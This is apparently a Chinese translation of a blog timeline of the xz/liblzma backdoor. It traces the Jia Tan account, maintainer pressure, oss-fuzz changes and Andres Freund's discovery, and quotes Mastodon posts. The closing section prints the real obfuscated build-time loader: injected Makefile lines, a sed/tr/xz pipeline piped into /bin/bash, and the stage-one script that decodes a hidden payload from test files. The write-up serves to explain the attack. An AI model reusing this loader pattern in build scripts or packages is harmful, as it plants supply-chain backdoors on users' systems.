【译文】我所知道的关于 Xz 后门的一切信息

请注意：此内容正在实时更新。更新的目的是为了更好地理解同时发现的大量有关该后门的信息：美国东部时间 7:18

2021

JiaT75 (Jia Tan) 创建了自己的 GitHub 账户。

他们提交的第一批内容并非 xz，但却令人深感怀疑。具体来说，他们在 libarchive 中开启了一个 PR：使用 bsdtar 解压缩时，在警告中添加了错误警告文本信息。这个提交做的比它说的要多一些。它用一个不安全的变体替换了 safe_fprint，可能会引入另一个漏洞。该代码未经任何讨论即被合并，并一直沿用至今（已打补丁）。除非另有证明，否则 libarchive 也应被视为已被攻破。

2022

2022 年，要求为 XZ 增加一名维护者的压力开始增大。

这封邮件发出三天后，JiaT75 首次提交了 xz：测试：创建了硬件功能测试。从这次提交开始，他们成为了 xz 的固定贡献者（目前是第二活跃的贡献者）。目前还不清楚他们是何时成为该版本库的信任者的。

Glyph

^{@glyph@mastodon.social}

我真的希望这能引起整个行业的反思，不要再让你的整个产品都压在一个工作过度、精神健康出现危机的人身上，而不在经济上或运营上给予他们任何支持。我希望所有依赖开源软件的人都能读到这条信息 https://www.mail-archive.com/xz-devel@tukaani.org/msg00567.html

^{Mar 29, 2024, 20:43}^{226 retoots}

2023

JiaT75 在 20231 年 1 月 7 日合并了他们的第一次提交，这很好地说明了他们何时完全获得信任。

3 月，谷歌 oss-fuzz 的主要联系人电子邮件由 Lasse Collin 更新为 Jia。

用于此漏洞利用的测试基础设施已提交。尽管 Lasse Collin 被认为是这个漏洞的作者，但 Jia 还是提交了它，而它最初是由 Hans Jansen 在 6 月份编写的：

Hans Jansen 的账户似乎是专门为创建此拉取请求而创建的。前后的活动都很少。他们稍后会推动将妥协后的 XZ 版本纳入 Debian。

七月，由于上述变更带来的问题，oss-fuzz 启动了一项 PR，以禁用 ifunc 进行模糊构建。这似乎是为了掩盖即将引入的恶意更改而故意为之。

2024

为 Google 的 oss-fuzz 开通了一个拉取请求，将项目的 URL 从 tukaani.org/xz/ 改为 xz.tukaani.org/xz-utils/。tukaani.org 托管在芬兰的 5.44.245.25，该托管公司。而 xz 子域则指向 GitHub 页面。这进一步加强了 Jia 对项目的控制。

包含执行后门所需的最后步骤的提交被添加到了版本库中：

发现

向 oss-security 邮件列表发送了一封电子邮件：上游 xz/liblzma 中的后门导致 ssh 服务器被入侵，宣布了这一发现，并尽力解释了漏洞利用链。

AndresFreundTec

^{@AndresFreundTec@mastodon.social}

当时我正在做一些微基准测试，需要静止系统以减少噪音。我发现 sshd 进程占用了大量 CPU，尽管因为用户名错误等原因它立即就会失败。对 sshd 进行剖析，发现 liblzma 占用大量 CPU，而 perf 无法将其归因于某个符号。我开始怀疑。我想起几周前，在软件包更新后，我在 postgres 的自动测试中看到过一个奇怪的 valgrind 投诉。

真的需要很多巧合。

^{Mar 29, 2024, 18:32}^{288 retoots}

一个 gist 已经发布了一份要点，其中包括非常好的高层技术概述和 “您需要了解的内容”。

我对这分文档的理解甚不如原作者，但我在这里一半是复述，一半是理解发生了什么：

不是很透彻，我还在摸索中

在上游压缩包中添加代码，从上面提交的文件中注入混淆脚本，”在 configure 结束时执行”。该代码反过来又 “修改 $builddir/src/liblzma/Makefile 以包含 “以下内容

am__test = bad-3-corrupt_lzma2.xz
...
am__test_dir=$(top_srcdir)/tests/files/$(am__test)
...
sed rpath $(am__test_dir) | $(am__dist_setup) >/dev/null 2>&1

(你会注意到这是上面添加的文件）”最后变成”（最后变成什么？）

sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr "	 \-_" " 	_\-" | xz -d | /bin/bash >/dev/null 2>&1;

报告称，”sed “结果是

####Hello####
#��Z�.hj�
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####